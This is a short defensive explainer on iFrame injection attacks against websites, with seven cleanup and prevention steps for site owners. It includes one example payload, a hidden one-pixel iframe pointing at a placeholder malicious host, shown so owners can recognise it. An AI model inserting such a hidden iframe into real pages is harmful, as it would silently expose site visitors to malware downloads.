iFrame Injection

An iFrame injection is a very common cross site scripting (or XSS) attack. It consists of one or more iFrame tags that have been inserted into a page or post’s content and typically downloads an executable program or conducts other actions that compromise the site visitors’ computers. In the best case, Google may label the site “malicious.” The worst case is that the site owner and visitors end up with malware infected computers.

iFrame Injection Examples

A basic iFrame injection may be something as simple as:

<iframe src=”http://www.badwebsite.com/inject/?s=some-parameters” width=”1″ height=”1″ style=”visibility: hidden”></iframe>

The injection is not visible unless the source is viewed on the page, and it often points directly to an IP address instead of a website.

Steps to Take if a Site is Hit with an iFrame Injection

Step 1 – Take the site offline for maintenance until the infection source is found and removed to avoid putting site visitors at risk of infection.

Step 2 – Change all passwords associated with the site. This includes the CMS login(s) (if one is used), FTP passwords, database passwords, web server passwords, and so on. Use strong replacements for the new set (i.e they should contain upper and lower case letters, numbers, and symbols).

Step 3 – Store a copy of the infected website on a portable device such as a thumb drive or CD/DVD-R in the event that additional analysis must be done once the site is recovered.

Step 4 – Fully replace the site if there are backup copies of it. Scan the backup files with an anti-virus program to ensure that the iFrame injection has not infected them with computer malware.

Step 5 – If there are no backup copies of the site, open each HTML or PHP page that generates HTML in a text editor to look for the offending iFrame code entries. If there was an attack, it is very likely that the offending iFrame code is in more than one location on the site. Depending on the website size, this may take a bit of time to accomplish. Remove the code as soon as it is found and save the updated page.

Step 6 – Upload the site and test to ensure that the iFrame injection no longer exists. After this, check the site to see how the malicious code was injected. It may have been injected because outdated versions of Content Management Systems such as WordPress or Joomla were being used, a cheap web host that does not update server software was being used, or the code was injected as an HTML comment. Once the way the attack was likely conducted is determined, update the software or find an alternative web hosting service if required. Other common attack sources include improper security settings on the server’s site files and running a custom coded HTML site.

Step 7 – Pay attention to visitor actions on the site to see if the injection attack is attempted again and consider shifting from FTP to SFTP in order to upload new files to the account. Be sure to change the site passwords at least once a month and keep up to date with software updates moving forward.